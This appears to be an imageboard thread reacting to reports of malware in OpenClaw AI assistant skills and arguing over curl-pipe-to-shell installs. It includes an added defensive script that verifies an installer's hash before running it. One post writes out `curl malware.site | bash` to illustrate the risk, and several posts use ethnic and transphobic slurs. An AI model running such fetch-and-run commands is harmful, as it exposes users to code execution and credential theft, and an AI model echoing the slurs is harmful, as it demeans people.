openclaw isn't a real thing people use, it's a grift made by some guy promoted on hackernews so he could get hired by openai to make more slop
based, hopefully it rooted their gpu kernels too
Is openclaw like your personal AI Assistant AGI?
OpenClaw literally means you hire a random guy to touch your computer; without limits, its permissions are dangerous
>>108192713
All AI code has this issue and it's only out in the open now because it's open source by Peter Steinberger.
This is a good thing, now people know there's malware out there in the skills.
It's the same with Claude, deepseek, Gemini, ChatGPT
>>108192713
anyone using those tools doesn't give a single fuck about opsec. They might not even know what the word means
>>108192844
Thank you ramdeep, very insightful
I hate whoever normalized curl | sh
>>108193938
The amount of times I've seen this on otherwise professional projects is infuriating.
>>108193938
How would it differ from package.linux.exe instead? You're running untrusted code either way.
>>108193938
>>108194027
it's convenient
what software you decide to use is much more important than how you download it
for curl to fuck up, an attacker needs to deeply compromise the server
if it's a reputable program, then:
1. the odds an attacker can serve a malicious script are low
2. the odds you happen to download the script at that moment are low
3. the odds you would find out later are high
downloading zed through curl is about as risky as downloading the nightly neovim build
>>108193938
You will install rust and you will be safe
>>108192713
must suck not having a brain huh AI jeets?
>>108194034
You could in theory run a virus scan on a file before running it. Web servers can detect what is pulling a script from them and return malware when curled or return safe code when downloaded via a browser.
If the system is running selinux in enforcing mode, session/credential stealers wouldn't be able to access the internet to upload data, and may not be able to read them in the first place if the default policy blocks reading .config files.
When you `curl malware.site | bash` you run the code directly with your permissions, which would have permission to access all of your .config files and internet
>>108194074
The issue is piping it into your shell without reviewing the script, which no one ever instructs the user to do. This is bad practice and no one should ever do it
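Added example, not written by any poster in this thread: the posts above point out that a server can return different bytes to curl than to a browser and that piping into a shell skips review, so this sketch saves the installer to a file, checks it against a pinned SHA-256, and only then runs it. The function names, the `INSTALLER_URL` placeholder and the demo installer are constructed for illustration.

```shell
#!/bin/sh
# Fetch-to-file, verify, then run, instead of `curl URL | sh`.
# The bytes that were reviewed and hashed are the bytes that get executed.

# Print the SHA-256 of a file (sha256sum on Linux, shasum elsewhere).
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Run a saved installer only if it matches the pinned digest.
# $1 = path to the saved script, $2 = expected SHA-256 (hex)
run_if_pinned() {
    actual=$(file_sha256 "$1")
    if [ -z "$actual" ] || [ "$actual" != "$2" ]; then
        echo "refusing to run $1: digest mismatch" >&2
        return 1
    fi
    sh "$1"
}

# --- constructed demo, runs offline ---
demo_dir=$(mktemp -d)
# Stand-in for: curl -fsSL "$INSTALLER_URL" -o "$demo_dir/install.sh"
printf '%s\n' '#!/bin/sh' 'echo "installing demo tool"' > "$demo_dir/install.sh"
# Assumption: in real use the digest is published by the project out of band
# (release notes, signed checksum file); here it is taken from the constructed file.
PINNED=$(file_sha256 "$demo_dir/install.sh")

# Simulate a second request that returned different bytes than the reviewed copy.
cp "$demo_dir/install.sh" "$demo_dir/tampered.sh"
echo 'echo "line the reviewer never saw"' >> "$demo_dir/tampered.sh"

run_if_pinned "$demo_dir/install.sh" "$PINNED"
run_if_pinned "$demo_dir/tampered.sh" "$PINNED" || echo "tampered copy blocked"
```

A matching digest only proves the file is the one that was pinned; it says nothing about whether that script is safe, which is what reading it before running is for.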
>>108194437
How is this any different to downloading a .exe on Windows?
>>108194551
Scripts are auditable. If it's built from source then you can audit that too, otherwise you can verify the elf is being pulled from the right source
Who knows what your winjeet .exe is doing. Winjeet tranny
Hahaha, we did say this exact thing would happen.
>>108194551
that's exactly the issue, downloading an .exe on windows was never safe either
>>108192713
>"What Would Elon Do"
>it just tricks you to steal your buttcoins
I wouldn't even call it false advertising.
>>108192713
Wow I sure am glad I'm not one of those retards
>>108194551
Downloading and running a random .exe is something only retarded kids do, source: downloaded and ran linkin_park_meteora.mp3.exe when I was 13
>>108192713
Thank God there were no casualties because nobody actually used that shit.